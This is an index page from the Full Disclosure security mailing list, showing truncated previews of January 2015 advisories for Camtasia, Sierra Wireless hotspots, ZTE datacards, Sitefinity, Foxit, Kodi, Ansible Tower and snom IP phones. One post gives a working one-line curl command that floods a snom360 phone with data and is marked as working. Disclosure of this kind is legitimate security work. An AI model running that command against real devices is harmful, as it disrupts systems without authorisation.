Full Disclosure
Posted by Martin Schuhmacher on Jan 14
Hi,
dd if=/dev/zero bs=1M count=32 | curl $IP –data-binary @-
[x] works
Firmware: snom360-SIP 8.7.4.8
this version was available for a very limited time + guessing
the correct filename for a snom360
Yours
Martin
Posted by Soroush Dalili on Jan 14
Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: –
Camtasia 8 (v8.4.4 (latest 8.x) – vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After…
Posted by Luke Walker on Jan 14
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
[*] Overview
Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.
The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.
[*] Description
The configuration…
Posted by kapejod () googlemail com on Jan 14
Nice, it seems you had more luck with reporting those issues.
I reported the path traversal and null-byte injection to Snom on the 12th
of March 2013.
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
ZTE Datacard PCW (Telecom Mobilise MF180) – Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1405
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1405
Common Vulnerability Scoring System:
====================================
6
Product & Service Introduction:…
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
Sitefinity Enterprise v7.2.53 – Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1369
Release Date:
=============
2015-01-06
Vulnerability Laboratory ID (VL-ID):
====================================
1369
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:…
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS – Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1400
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-2 >
=======================================================================
title: Cross-Site Request Forgery
product: Kodi/XBMC
vulnerable version: XBMC/Kodi <=14
fixed version: no fixed version available
impact: medium
homepage: http://kodi.tv/
found: 2014-10-29
by: W. Ettlinger…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
title: Privilege Escalation & XSS & Missing Authentication
product: Ansible Tower
vulnerable version: <=2.0.2
fixed version: >=2.0.5
impact: high
homepage: http://www.ansible.com/tower
found: 2014-10-15
by:…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: snom IP phones
vulnerable version: all firmware versions <8.7.5.15, all firmware branches
of all snom desktop IP phones (3xx, 7xx, 8xx, etc)
are affected
fixed version: 8.7.5.15…